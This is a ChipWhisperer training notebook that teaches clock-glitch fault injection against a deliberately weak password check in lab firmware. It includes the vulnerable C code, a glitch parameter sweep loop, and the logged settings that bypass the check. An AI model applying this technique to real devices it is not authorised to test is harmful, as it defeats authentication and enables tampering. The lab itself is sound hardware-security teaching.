# Part 1, Topic 2: Clock Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous lab, we learned how clock glitching can be used to cause a target to behave unexpectedly. In this lab, we'll look at a slightly more realistic example - glitching past a password check*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

We've already seen how we can insert clock gliches to mess up a calculation that a target is trying to make. While this has many applications, some which will be covered in Fault_201, let's take a look at something a little closer to our original example of glitch vulnerable code: a password check. No need to change out firmware here, we're still using the simpleserial-glitch project (though we'll go through all the build stuff again).

The code is as follows for the password check:

```C
uint8_t password(uint8_t* pw)
{
    char passwd[] = "touch";
    char passok = 1;
    int cnt;

    trigger_high();

    //Simple test - doesn't check for too-long password!
    for(cnt = 0; cnt < 5; cnt++){
        if (pw[cnt] != passwd[cnt]){
            passok = 0;
        }
    }
    
    trigger_low();
    
    simpleserial_put('r', 1, (uint8_t*)&passok);
    return passok;
}
```

There's really nothing out of the ordinary here - it's just a simple password check. We can communicate with it using the `'p'` command.

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
SS_VER = 'SS_VER_2_1'

In [2]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2 -j

SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
make[1]: '.dep' is up to date.
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc (15:10.3-2021.07-4) 10.3.1 20210621 (release)
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Assembling: .././hal/stm32f3/stm32f3_startup.S
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -DF_CPU=7372800 -Wa,-gstabs,-adhlns=objdir-CWLITEARM/stm32f3_startup.lst -I.././simpleserial/ -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ .././hal/stm32f3/stm32f3_startup.S -o objdir-

In [3]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

INFO: Found ChipWhisperer😍
scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 11949547                  to 22981462                 
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 1411514                   to 41235557                 
scope.clock.adc_rate                     changed from 1411514.0                 to 41235557.0        

In [4]:
fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
if SS_VER == 'SS_VER_2_1':
    target.reset_comms()

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5835 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5835 bytes


In [5]:
def reboot_flush():
    reset_target(scope)
    #Flush garbage too
    target.flush()

If we send a wrong password:

In [6]:
#Do glitch loop
reboot_flush()
pw = bytearray([0x00]*5)
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)
payl = int.from_bytes(val['payload'], byteorder='little', signed=True)
print(payl)

{'valid': True, 'payload': CWbytearray(b'00'), 'full_response': CWbytearray(b'00 72 01 00 99 00'), 'rv': bytearray(b'\x00')}
0


We get a response of zero. But if we send the correct password:

In [7]:
import struct
#Do glitch loop
reboot_flush()
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68]) # correct password ASCII representation
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)
payl = int.from_bytes(val['payload'], byteorder='little', signed=True)
print(payl)

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
1


We get a 1 back. Set the glitch up as in the previous part:

In [6]:
scope.cglitch_setup()
print(scope.glitch)

scope.clock.adc_freq                     changed from 41235557                  to 31654140                 
scope.clock.adc_rate                     changed from 41235557.0                to 31654140.0               
clk_src     = clkgen
width       = 10.15625
width_fine  = 0
offset      = 10.15625
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 0
repeat      = 1
output      = clock_xor



Update the code below to also add an ext offset parameter:

In [9]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

Like before, we'll plot our settings. The plot is 2D, so you'll need to make a decision about what to plot. In this case, we'll plot offset and ext_offset, but pick whichever you like:

In [14]:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None}, x_index="ext_offset", y_index="offset")

:DynamicMap   []
   :Overlay
      .Points.I  :Points   [ext_offset,offset]
      .Points.II :Points   [ext_offset,offset]

And make a glitch loop. Make sure you use some successful settings that you found in the previous lab, since it will make this one much shorter!

One change you probably want to make is to add a scan for ext_offset. The number of places we can insert a successful glitch has gone way down. Doing this will also be very important for future labs.

In [11]:
from tqdm.notebook import tqdm
import re
import struct
from chipwhisperer import logging
# gc.set_global_step(step)
cw.glitch_logger.setLevel(logging.ERROR)


# replace these with your settings from the last part
# The example width/offset settings shown here are for CW-Lite/Pro; width/offset are expressed differently for Husky (see Fault 1_1)
gc.set_range("width", 0.8, 3.6)
gc.set_range("offset", -4, -2)

step = 0.4
gc.set_global_step(step)

# you can leave this range for ext_offset
gc.set_range("ext_offset", 0, 100)
gc.set_step("ext_offset", 1)
scope.adc.timeout = 0.1
scope.glitch.repeat = 1
reboot_flush()

for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    if scope.adc.state:
        # can detect crash here (fast) before timing out (slow)
        print("Trigger still high!")
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()

    scope.arm()
    target.simpleserial_write('p', bytearray([0x00]*5)) #send an incorrect password

    ret = scope.capture()

    if ret:
        print('Timeout - no trigger')
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()

    else:
        val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10, timeout=50) #For loop check
        
        if not val['valid']: #fill in with invalid response detection
            gc.add("reset")
        else:
            payl = int.from_bytes(val['payload'], byteorder='little', signed=True)
            if payl == 1: # replace this
                gc.add("success")
                print(val['payload'])
                print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                print("🐙", end="")
            else:
                gc.add("normal")

(ChipWhisperer Target ERROR|File SimpleSerial2.py:184) Infinite loop in unstuff data
(ChipWhisperer Target ERROR|File SimpleSerial2.py:185) CWbytearray(b'00 00 00 00 00 00')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 0
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 0, 1


Trigger still high!
CWbytearray(b'01')
0.78125 -3.90625 4
🐙

(ChipWhisperer Target ERROR|File SimpleSerial2.py:184) Infinite loop in unstuff data
(ChipWhisperer Target ERROR|File SimpleSerial2.py:185) CWbytearray(b'00 00 00 00 00 00')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 0
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 0, 1


Trigger still high!


(ChipWhisperer Target ERROR|File SimpleSerial2.py:184) Infinite loop in unstuff data
(ChipWhisperer Target ERROR|File SimpleSerial2.py:185) CWbytearray(b'00 00 00 00 00 00')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 0
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 0, 1


...

Timeout - no trigger


(ChipWhisperer Target ERROR|File SimpleSerial2.py:184) Infinite loop in unstuff data
(ChipWhisperer Target ERROR|File SimpleSerial2.py:185) CWbytearray(b'00 00 00 00 00 00')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 0
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 0, 1
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:623) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:623) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a


Timeout - no trigger


(ChipWhisperer Target ERROR|File SimpleSerial2.py:184) Infinite loop in unstuff data
(ChipWhisperer Target ERROR|File SimpleSerial2.py:185) CWbytearray(b'00 00 00 00 00 00')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 0
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 0, 1
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:623) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:623) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08


Timeout - no trigger


For this lab, you may want two copies of your results; one for finding effective ext_offsets:

In [12]:
results = gc.calc(ignore_params=["width", "offset"], sort="success_rate")
results

[((48,),
  {'total': 49,
   'success': 3,
   'success_rate': 0.061224489795918366,
   'reset': 1,
   'reset_rate': 0.02040816326530612,
   'normal': 45,
   'normal_rate': 0.9183673469387755}),
 ((45,),
  {'total': 48,
   'success': 1,
   'success_rate': 0.020833333333333332,
   'reset': 0,
   'reset_rate': 0.0,
   'normal': 47,
   'normal_rate': 0.9791666666666666}),
 ((44,),
  {'total': 48,
   'success': 1,
   'success_rate': 0.020833333333333332,
   'reset': 0,
   'reset_rate': 0.0,
   'normal': 47,
   'normal_rate': 0.9791666666666666}),
 ((4,),
  {'total': 48,
   'success': 1,
   'success_rate': 0.020833333333333332,
   'reset': 0,
   'reset_rate': 0.0,
   'normal': 47,
   'normal_rate': 0.9791666666666666}),
 ((100,),
  {'total': 48,
   'success': 0,
   'success_rate': 0.0,
   'reset': 1,
   'reset_rate': 0.020833333333333332,
   'normal': 47,
   'normal_rate': 0.9791666666666666}),
 ((99,),
  {'total': 48,
   'success': 0,
   'success_rate': 0.0,
   'reset': 3,
   'reset_rate': 0

And one for your width/offset settings:

In [13]:
results = gc.calc(ignore_params=["ext_offset"], sort="success_rate")
results

[((2.0, -4),
  {'total': 112,
   'success': 2,
   'success_rate': 0.017857142857142856,
   'reset': 37,
   'reset_rate': 0.33035714285714285,
   'normal': 73,
   'normal_rate': 0.6517857142857143}),
 ((0.8, -4),
  {'total': 114,
   'success': 2,
   'success_rate': 0.017543859649122806,
   'reset': 42,
   'reset_rate': 0.3684210526315789,
   'normal': 70,
   'normal_rate': 0.6140350877192983}),
 ((2.0, -3.6),
  {'total': 105,
   'success': 1,
   'success_rate': 0.009523809523809525,
   'reset': 6,
   'reset_rate': 0.05714285714285714,
   'normal': 98,
   'normal_rate': 0.9333333333333333}),
 ((3.5999999999999996, -2.0000000000000004),
  {'total': 109,
   'success': 1,
   'success_rate': 0.009174311926605505,
   'reset': 26,
   'reset_rate': 0.23853211009174313,
   'normal': 82,
   'normal_rate': 0.7522935779816514}),
 ((3.5999999999999996, -2.4000000000000004),
  {'total': 102,
   'success': 0,
   'success_rate': 0.0,
   'reset': 4,
   'reset_rate': 0.0392156862745098,
   'normal': 98,


In [7]:
from tqdm.notebook import tqdm
import re
import struct
from chipwhisperer import logging
# gc.set_global_step(step)
cw.glitch_logger.setLevel(logging.ERROR)

scope.adc.timeout = 0.1
scope.glitch.repeat = 1

In [32]:
reboot_flush()
scope.glitch.offset = -4
scope.glitch.width = 2.0
scope.glitch.ext_offset = 48
if scope.adc.state:
    # can detect crash here (fast) before timing out (slow)
    print("Trigger still high!")
    gc.add("reset")

    #Device is slow to boot?
    reboot_flush()

scope.arm()
target.simpleserial_write('p', bytearray([0x00]*5)) #send an incorrect password

ret = scope.capture()

if ret:
    print('Timeout - no trigger')

    #Device is slow to boot?
    reboot_flush()

else:
    val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10, timeout=50) #For loop check
    
    if not val['valid']: #fill in with invalid response detection
        print('Invalid result')
    else:
        payl = int.from_bytes(val['payload'], byteorder='little', signed=True)
        if payl == 1: # replace this
            print(val['payload'])
            print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
            print("🐙", end="")
        else:
            print("Nothing happened.")

CWbytearray(b'01')
1.953125 -3.90625 48
🐙

In [33]:
scope.dis()
target.dis()